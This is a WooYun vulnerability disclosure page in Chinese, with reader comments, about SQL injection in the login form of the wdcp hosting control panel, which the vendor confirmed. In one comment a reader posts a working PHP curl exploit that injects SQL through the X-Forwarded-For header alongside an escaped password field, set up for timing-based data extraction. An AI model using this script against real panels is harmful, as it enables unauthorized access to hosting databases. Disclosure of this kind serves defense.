当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042311

漏洞标题:wdcp虚拟主机管理系统注入漏洞

相关厂商:wdlinux

漏洞作者: whking

提交时间:2013-11-08 08:42

修复时间:2013-12-23 08:43

公开时间:2013-12-23 08:43

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-08: 细节已通知厂商并且等待厂商处理中
2013-11-08: 厂商已经确认,细节仅向厂商公开
2013-11-18: 细节向核心白帽子及相关领域专家公开
2013-11-28: 细节向普通白帽子公开
2013-12-08: 细节向实习白帽子公开
2013-12-23: 细节向公众公开

简要描述:

wdcp服务器/虚拟主机管理系统 注入漏洞

详细说明:

wdcp服务器/虚拟主机管理系统登陆框注入漏洞。
passwd字段存在注入风险,选择限制字符长度为30.我想应该有大牛能绕过!

1.jpg

漏洞证明:

1.jpg

修复方案:

过滤吧!

版权声明:转载请注明来源 whking@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-11-08 21:35

厂商回复:

是存在可能被注入的可能
升级到最新的2.5.9版本即可

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-08 11:43 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    mark

  2. 2013-11-08 13:03 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    这个好

  3. 2013-11-08 20:27 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    我擦 我一直在用这个 坑爹啊

  4. 2013-11-08 20:42 | 职业色羊 ( 路人 | Rank:10 漏洞数:2 | 无)

    @whking 期待。。。

  5. 2013-11-08 21:30 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    Mark

  6. 2013-11-30 16:53 | QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)

    亲,你能构造语句么..我没构造出来..

  7. 2014-04-16 17:14 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    @xsser 这个漏洞就是专业坑爹的 洞主没告诉大家单引号被转译了这个事实,刚好\'的一个字符被*号掩盖了 浪费我一下午时间

  8. 2014-05-04 07:27 | 伟大娃娃 ( 普通白帽子 | Rank:130 漏洞数:10 | 改变世界)

    @北洋贱队 这个漏洞可以利用的.<?php$id=$_GET["id"];//$id2=$_GET["id2"];$post_data = 'username=admin&passwd=bbbbbb\&Submit_login=aaaassss'; $url='http://xxx.com:8080/'; $starttime = time(); $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); //curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: ,('.$id.'),char(65),1) #')); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); ob_start(); curl_exec($ch); $result = ob_get_contents() ; ob_end_clean(); $endtime = time();/*if($endtime-$starttime>=3){ exit($id." is ".chr($id2));}*/echo $result;?>

  9. 2014-05-05 20:11 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    @伟大娃娃 这个好!!

  10. 2014-05-05 23:55 | whking ( 路人 | Rank:14 漏洞数:4 | 诚实守信,与人为善!)

    @北洋贱队 传说中的大牛出现了。

  11. 2014-09-23 05:04 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    @伟大娃娃 感谢+1

  12. 2015-01-30 10:43 | 蚊子 ( 路人 | Rank:2 漏洞数:1 )

    @伟大娃娃 这文件咋利用啊。我咋没利用上来